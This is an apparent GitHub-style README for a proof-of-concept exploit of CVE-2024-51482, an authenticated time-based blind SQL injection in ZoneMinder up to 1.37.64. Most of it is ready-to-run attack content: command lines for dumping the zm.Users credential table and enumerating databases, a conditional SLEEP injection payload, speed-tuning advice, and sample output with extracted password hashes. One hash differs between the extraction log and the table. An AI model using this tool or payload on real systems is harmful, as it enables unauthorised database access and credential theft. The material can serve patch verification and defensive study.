Share
## https://sploitus.com/exploit?id=3A2D8152-90D2-5A38-88F5-8A4B7A6718B2
# CVE-2024-51482-PoC

Authenticated time-based blind SQL injection exploit for **ZoneMinder v1.37.* <= 1.37.64**

## ๐ŸŽฏ Overview

This is a proof-of-concept exploit for CVE-2024-51482, a time-based blind SQL injection vulnerability in ZoneMinder's event management functionality. The exploit requires authentication and uses conditional SLEEP queries to extract data from the database.

## โœจ Features

- โœ… **Authenticated exploitation** - Login with credentials or session cookie
- โœ… **Length detection** - Binary search to find exact string length before extraction
- โœ… **Parallel extraction** - Multi-threaded character extraction for speed
- โœ… **sqlmap-style options** - Enumerate databases, tables, columns, and dump data
- โœ… **Safe defaults** - 3s delay, 5 threads for high accuracy
- โœ… **Progress tracking** - Real-time extraction progress with verbose mode
- โœ… **Clean output** - Formatted table display for dumped data

## ๐Ÿ“‹ Requirements

```bash
pip install requests
```

## ๐Ÿš€ Quick Start

### Default Mode - Dump Credentials
```bash
python3 poc.py -t example.local -u admin -p password
```

### With Session Cookie
```bash
python3 poc.py -t example.local --cookie 'ZMSESSID_value'
```

### Verbose Mode
```bash
python3 poc.py -t example.local -u admin -p password -v
```

## ๐Ÿ“– Usage

### Enumerate Databases
```bash
python3 poc.py -t example.local -u admin -p password --dbs
```

### Enumerate Tables
```bash
python3 poc.py -t example.local -u admin -p password -D zm --tables
```

### Enumerate Columns
```bash
python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns
```

### Dump Specific Table
```bash
python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump
```

## โš™๏ธ Options

```
Required:
  -t, --target TARGET       Target URL (IP, hostname, or full URL)
  
Authentication:
  -u, --username USERNAME   Username for authentication
  -p, --password PASSWORD   Password for authentication
  --cookie COOKIE           Session cookie (ZMSESSID)

Enumeration:
  --dbs                     Enumerate databases
  -D, --database DATABASE   Database to use
  --tables                  Enumerate tables
  -T, --table TABLE         Table to use
  --columns                 Enumerate columns
  --dump                    Dump table data

Performance:
  --delay DELAY             Time delay in seconds (default: 3, safe)
  --threads THREADS         Number of threads (default: 5, safe)
  -v, --verbose             Show extraction progress
```

## ๐ŸŽ›๏ธ Performance Tuning

### Safe Mode (Recommended)
```bash
python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
```
- **Speed**: ~2-3 minutes per password hash
- **Accuracy**: โœ… High

### Fast Mode (May have errors)
```bash
python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
```
- **Speed**: ~30-60 seconds per password hash
- **Accuracy**: โš ๏ธ May produce incorrect characters

## ๐Ÿ“Š Example Output

```
[*] Target: http://example.local
[*] Delay: 3s | Threads: 5
[+] Authenticated as admin
[*] Testing vulnerability...
[+] Target is VULNERABLE!

[*] Default mode: Dumping zm.Users credentials...
[*] Dumping data from 'zm.Users'...
[+] Extracted: admin
[+] Extracted: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extracted: john
[+] Extracted: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Username   | Password                                                      |
====================================================================================
| admin      | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john       | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entries dumped
```

## ๐Ÿ”ง How It Works

1. **Authentication** - Logs in with credentials or uses provided session cookie
2. **Vulnerability Test** - Confirms target is vulnerable with simple SLEEP payload
3. **Length Detection** - Uses binary search to find exact string length
4. **Parallel Extraction** - Extracts all character positions simultaneously
5. **Data Display** - Formats results in clean table

### Payload Format

The exploit uses sqlmap-style conditional SLEEP:

```sql
1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
```

- **TRUE condition**: No delay (0 seconds)
- **FALSE condition**: Full delay (3 seconds)

## ๐Ÿ› Troubleshooting

### Inaccurate Results
If you get wrong characters (e.g., `$` becomes `8`):
```bash
# Increase delay and reduce threads
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3
```

### Too Slow
If extraction is too slow:
```bash
# Decrease delay and increase threads (may reduce accuracy)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10
```

### No Data Found
If default `zm.Users` doesn't exist:
```bash
# Enumerate databases first
python3 poc.py -t example.local -u admin -p password --dbs

# Then enumerate tables
python3 poc.py -t example.local -u admin -p password -D database_name --tables
```

## ๐Ÿ“ CVE Information

- **CVE ID**: CVE-2024-51482
- **Affected Versions**: ZoneMinder v1.37.* <= 1.37.64
- **Fixed In**: v1.37.65
- **Vulnerability Type**: Time-based Blind SQL Injection
- **CVSS Score**: TBD

## โš ๏ธ Disclaimer

This tool is for **educational and authorized security testing purposes only**. 

- Do not use this tool against systems you do not own or have explicit permission to test
- Unauthorized access to computer systems is illegal
- The author is not responsible for any misuse or damage caused by this tool
- Always obtain proper authorization before conducting security assessments

## ๐Ÿ“š References

- [NVD - CVE-2024-51482](https://nvd.nist.gov/vuln/detail/CVE-2024-51482)
- [ZoneMinder GitHub](https://github.com/ZoneMinder/zoneminder)

## ๐Ÿ“„ License

This project is provided for educational purposes only. Use responsibly and ethically.

---

**โญ If you find this useful, please star the repository!**